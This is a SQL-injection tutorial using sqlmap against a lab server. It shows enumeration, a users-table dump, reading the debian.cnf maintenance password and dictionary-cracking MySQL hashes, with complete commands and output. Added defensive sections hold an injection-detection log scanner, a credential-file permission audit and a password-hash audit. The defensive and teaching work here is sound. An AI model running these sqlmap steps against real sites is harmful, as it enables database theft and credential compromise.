SQLMAP 3: Obtaining data
Posted on 2012-9-13 23:39:39
Getting the databases

    root@Dis9Team:~# sqlmap -u "http://5.5.5.8/pen/news.php?id=1" --dbs
    [21:17:47] [INFO] fetching database names
    available databases [3]:
    [*] information_schema
    [*] mysql
    [*] pentest
Specifying a database and getting its tables

As you can see there are 3 databases; we specify pentest.

    root@Dis9Team:~# sqlmap -u "http://5.5.5.8/pen/news.php?id=1" -D pentest --tables
    [21:18:38] [INFO] fetching tables for database: 'pentest'
    Database: pentest
    [2 tables]
    +-------+
    | stuff |
    | users |
    +-------+
Getting the columns: there are two tables; get the columns of users.

    root@Dis9Team:~# sqlmap -u "http://5.5.5.8/pen/news.php?id=1" -D pentest -T users --columns
    Database: pentest
    Table: users
    [3 columns]
    +----------+---------------------------+
    | Column   | Type                      |
    +----------+---------------------------+
    | id       | int(10) unsigned zerofill |
    | password | varchar(45)               |
    | username | varchar(45)               |
    +----------+---------------------------+
Dumping the contents

    root@Dis9Team:~# sqlmap -u "http://5.5.5.8/pen/news.php?id=1" -D pentest -T users -C id,password,username --dump
    Database: pentest
    Table: users
    [2 entries]
    +------------+----------+----------+
    | id         | username | password |
    +------------+----------+----------+
    | 0000000000 | admin    | admin    |
    | 0000000001 | guest    | guest    |
    +------------+----------+----------+
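The four enumeration steps above (databases, tables, columns, dump) all ride on the same injectable id parameter of news.php, so they leave a recognisable trail in the web server's access log. The following is an added example, not part of the original post: it parses constructed Apache combined-format log lines and flags requests that carry the payload shapes such enumeration produces (tautologies, UNION SELECT, information_schema lookups, time delays, hex-encoded string literals) or the default sqlmap User-Agent. The log lines, the client address 5.5.5.9 and the indicator names are all constructed for the example.

```python
import re
from urllib.parse import unquote_plus

# Constructed Apache combined-format log lines (not from the original post).
# The request path mirrors the walkthrough's target; the payloads are the kind
# of probes that schema enumeration through information_schema emits.
# 0x70656e74657374 is the hex encoding of the string "pentest".
SAMPLE_LOG = """\
5.5.5.9 - - [13/Sep/2012:21:17:47 +0800] "GET /pen/news.php?id=1 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
5.5.5.9 - - [13/Sep/2012:21:17:48 +0800] "GET /pen/news.php?id=1%20AND%201=1 HTTP/1.1" 200 512 "-" "sqlmap/1.0-dev (http://sqlmap.org)"
5.5.5.9 - - [13/Sep/2012:21:17:49 +0800] "GET /pen/news.php?id=1%20UNION%20SELECT%20NULL,schema_name%20FROM%20information_schema.schemata HTTP/1.1" 200 940 "-" "Mozilla/5.0"
5.5.5.9 - - [13/Sep/2012:21:17:50 +0800] "GET /pen/news.php?id=1%20AND%20SLEEP(5) HTTP/1.1" 200 512 "-" "Mozilla/5.0"
5.5.5.9 - - [13/Sep/2012:21:18:38 +0800] "GET /pen/news.php?id=1%20AND%20(SELECT%20COUNT(*)%20FROM%20information_schema.tables%20WHERE%20table_schema=0x70656e74657374)>0 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
5.5.5.9 - - [13/Sep/2012:21:19:00 +0800] "GET /pen/news.php?id=2 HTTP/1.1" 200 498 "-" "Mozilla/5.0"
"""

# Apache "combined" format: ip ident user [time] "req" status bytes "referer" "ua"
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d+) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)

# Each indicator is (name, regex) applied to the URL-decoded request path.
PAYLOAD_INDICATORS = [
    ("tautology", re.compile(r"\b(?:and|or)\b\s+\d+\s*=\s*\d+", re.I)),
    ("union_select", re.compile(r"\bunion\b.{0,40}?\bselect\b", re.I)),
    ("information_schema", re.compile(r"\binformation_schema\b", re.I)),
    ("time_based", re.compile(r"\b(?:sleep|benchmark)\s*\(", re.I)),
    ("hex_literal", re.compile(r"0x[0-9a-f]{6,}", re.I)),
]


def parse_line(line):
    """Return the combined-log fields as a dict, or None if the line does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def indicators_for(entry):
    """Names of every indicator that fires on one parsed log entry."""
    hits = []
    if "sqlmap" in entry["ua"].lower():
        hits.append("sqlmap_user_agent")
    decoded = unquote_plus(entry["path"])
    for name, rx in PAYLOAD_INDICATORS:
        if rx.search(decoded):
            hits.append(name)
    return hits


def analyze_log(text):
    """Scan log text and return one finding per request that trips an indicator."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        entry = parse_line(line)
        if entry is None:
            continue
        hits = indicators_for(entry)
        if hits:
            findings.append({"line": lineno, "ip": entry["ip"],
                             "path": unquote_plus(entry["path"]), "indicators": hits})
    return findings


def probes_per_ip(findings):
    """Count flagged requests per source address, the number to alert on."""
    counts = {}
    for f in findings:
        counts[f["ip"]] = counts.get(f["ip"], 0) + 1
    return counts


if __name__ == "__main__":
    found = analyze_log(SAMPLE_LOG)
    for f in found:
        print(f"line {f['line']:>2} {f['ip']} {', '.join(f['indicators'])}: {f['path']}")
    print(probes_per_ip(found))
```

Only the User-Agent check is tied to sqlmap itself and is trivially changed by the operator; the payload indicators catch the enumeration regardless of tool, which is why the per-address count, not any single hit, is the thing to alert on.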
Getting the MySQL users

    root@Dis9Team:~# sqlmap -u "http://5.5.5.8/pen/news.php?id=1" --users
    [21:22:09] [INFO] fetching database users
    database management system users [108]:
    [*] 'debian-sys-maint'@'localhost'
    [*] 'root'@'127.0.0.1'
    [*] 'root'@'localhost'
    [*] 'root'@'ubuntu'
The first one is the Ubuntu default. debian-sys-maint is the account Debian uses to maintain MySQL; think of it as the account that a "non-standard" system program logs into MySQL with when it performs backups, restores and similar tasks.

The debian-sys-maint user exists only on Debian or Ubuntu servers, so if your server runs Debian or Ubuntu, debian-sys-maint is a user created by the MySQL installation itself; its specific job is restarting and running the mysql service. This user also has a security problem: its privileges are the same as root's, and its password can be found in a file under /etc, so this account needs some restrictions.
    root@ubuntu:/# cat /etc/mysql/debian.cnf
    # Automatically generated for Debian scripts. DO NOT TOUCH!
    [client]
    host     = localhost
    user     = debian-sys-maint
    password = NKjpIxCOU2bJymz7
    socket   = /var/run/mysqld/mysqld.sock
    [mysql_upgrade]
    host     = localhost
    user     = debian-sys-maint
    password = NKjpIxCOU2bJymz7
    socket   = /var/run/mysqld/mysqld.sock
    basedir  = /usr
    root@ubuntu:/#
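The text above makes two points a defender can act on: debian-sys-maint carries the same privileges as root, and its clear-text password sits in /etc/mysql/debian.cnf, so that file must remain readable by root alone (mode 0600). The following audit helper is an added example, not from the original post: it checks the owner and mode bits of such a credential file, and its demo writes a constructed debian.cnf-style file with a placeholder password into a temporary location and audits it with the weak mode beside the corrected one. The function name check_credential_file is the example's own.

```python
import os
import stat
import tempfile

# Added audit helper (not from the original post). It verifies that a file
# holding database credentials, such as /etc/mysql/debian.cnf, is owned by the
# expected user and is neither readable nor writable by group or others.


def check_credential_file(path, expected_uid=0):
    """Return a list of findings for one credential file; empty means it passes."""
    findings = []
    try:
        st = os.stat(path)
    except FileNotFoundError:
        return [f"{path}: missing"]
    if st.st_uid != expected_uid:
        findings.append(f"{path}: owned by uid {st.st_uid}, expected uid {expected_uid}")
    mode = stat.S_IMODE(st.st_mode)
    if mode & (stat.S_IRGRP | stat.S_IWGRP):
        findings.append(f"{path}: group-accessible (mode {mode:04o})")
    if mode & (stat.S_IROTH | stat.S_IWOTH):
        findings.append(f"{path}: world-accessible (mode {mode:04o})")
    return findings


def demo():
    """Audit a constructed debian.cnf-style file before and after tightening it.

    Returns (findings_with_mode_0644, findings_with_mode_0600)."""
    # Constructed content with a placeholder; never reuse a real maintenance password.
    content = (
        "[client]\n"
        "host     = localhost\n"
        "user     = debian-sys-maint\n"
        "password = PLACEHOLDER_NOT_A_REAL_PASSWORD\n"
        "socket   = /var/run/mysqld/mysqld.sock\n"
    )
    with tempfile.NamedTemporaryFile("w", suffix=".cnf", delete=False) as fh:
        fh.write(content)
        path = fh.name
    try:
        me = os.getuid()               # the demo file belongs to us, not root
        os.chmod(path, 0o644)          # weak setting: readable by every local user
        before = check_credential_file(path, expected_uid=me)
        os.chmod(path, 0o600)          # corrected setting: owner only
        after = check_credential_file(path, expected_uid=me)
    finally:
        os.unlink(path)
    return before, after


if __name__ == "__main__":
    weak, fixed = demo()
    print("mode 0644:", weak or "ok")
    print("mode 0600:", fixed or "ok")
    # On a real Debian/Ubuntu host, run as root: the file should pass unchanged.
    print(check_credential_file("/etc/mysql/debian.cnf") or "debian.cnf ok")
```

Tightening the file's mode limits who can read the password locally; it does nothing about the privilege level of the account itself, which is the second half of the author's point and has to be addressed in MySQL's grant tables.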
Getting the users' password hashes

    root@Dis9Team:~# sqlmap -u "http://5.5.5.8/pen/news.php?id=1" --passwords
    do you want to perform a dictionary-based attack against retrieved password hashes? [Y/n/q] Y    # whether to crack the hashes automatically
    [21:28:21] [INFO] using hash method 'mysql_passwd'
    what dictionary do you want to use?
    [1] default dictionary file '/pen/sql/sqlmap/txt/wordlist.zip' (press Enter)    # choose the dictionary
    [2] custom dictionary file
    [3] file with list of dictionary files
    > 1
    [21:28:24] [INFO] using default dictionary
    do you want to use common password suffixes? (slow!) [y/N] y
    [21:28:26] [INFO] starting dictionary-based cracking (mysql_passwd)
    [21:28:27] [INFO] cracked password '123456' for user 'root'
    [21:28:40] [INFO] current status: sj860... \^C
    [21:28:40] [WARNING] user aborted during dictionary-based attack phase (Ctrl+C was pressed)
    [21:28:40] [INFO] writing uncracked hashes to file '/tmp/tmpiTxL5z.txt' for eventual further processing
    database management system users password hashes:
    [*] debian-sys-maint [1]:
        password hash: *F18C8FC7AA96F303EC2A90C61A1A9AE83225E034
    [*] root [1]:
        password hash: *6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9
        clear-text password: 123456    # cracking result
    [21:28:40] [INFO] fetched data logged to text files under '/pen/sql/sqlmap/output/5.5.5.8'
    [*] shutting down at 21:28:40
    root@Dis9Team:~#
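The hash method sqlmap reports, mysql_passwd, is MySQL's mysql_native_password scheme: an asterisk followed by the uppercase hex of SHA1(SHA1(password)), with no salt and no work factor, which is why the dictionary run above finds root's '123456' one second after it starts. The example below is added here and is not from the original post: it reproduces that format and checks it against the root hash shown in the output, shows how a DBA can audit the stored hashes against a banned-password list before anyone else does, and contrasts the scheme with a salted, iterated PBKDF2 hash suitable for the application's own users table, which the dump earlier showed holding admin/admin in clear text. The banned-password list, the sample user set and the app_hash/app_verify helpers are the example's own assumptions.

```python
import hashlib
import hmac
import os

# Added example, not from the original post. mysql_native_password (sqlmap's
# 'mysql_passwd' method) stores '*' + uppercase hex of SHA1(SHA1(password)).
# There is no salt: two accounts with the same password share one hash, and
# every candidate costs two SHA-1 calls.


def mysql_native_password(password: str) -> str:
    """Compute the 41-character mysql_native_password hash of a password."""
    inner = hashlib.sha1(password.encode("utf-8")).digest()
    return "*" + hashlib.sha1(inner).hexdigest().upper()


def audit_weak_passwords(user_hashes, banned):
    """Map each user whose stored hash matches a banned password to that password.

    user_hashes: {username: hash as stored in mysql.user}
    banned: passwords the organisation's policy forbids (constructed list here)."""
    banned_hashes = {mysql_native_password(p): p for p in banned}
    return {u: banned_hashes[h] for u, h in user_hashes.items() if h in banned_hashes}


# Contrast for the application's own users table: a random per-user salt and an
# iterated KDF, so equal passwords hash differently and each guess is expensive.
def app_hash(password: str, salt: bytes = b"", iterations: int = 600_000) -> str:
    """Return 'pbkdf2_sha256$<iterations>$<salt hex>$<key hex>' for storage."""
    salt = salt or os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${dk.hex()}"


def app_verify(password: str, stored: str) -> bool:
    """Recompute the key from the stored parameters and compare in constant time."""
    algo, iters, salt_hex, dk_hex = stored.split("$")
    if algo != "pbkdf2_sha256":
        return False
    dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"),
                             bytes.fromhex(salt_hex), int(iters))
    return hmac.compare_digest(dk.hex(), dk_hex)


if __name__ == "__main__":
    # Constructed sample of mysql.user contents; the root hash is the one in the
    # sqlmap output above, the other is a made-up strong password.
    sample_users = {
        "root": "*6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9",
        "app":  mysql_native_password("correct horse battery staple"),
    }
    banned = ["password", "123456", "admin", "root", "guest"]
    print("weak MySQL accounts:", audit_weak_passwords(sample_users, banned))
    stored = app_hash("admin", iterations=100_000)
    print("same password, different app hashes:", stored != app_hash("admin", iterations=100_000))
    print("verify admin:", app_verify("admin", stored), "verify guest:", app_verify("guest", stored))
```

The audit function is the policy check run from the DBA's side of the table: it only needs the banned list, which is short and fixed, while the lack of a salt is exactly what made the full dictionary run against the same hashes cheap.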
Verbose output: -v 1 to 10

    root@Dis9Team:~# sqlmap -u "http://5.5.5.8/pen/news.php?id=1" --users -v10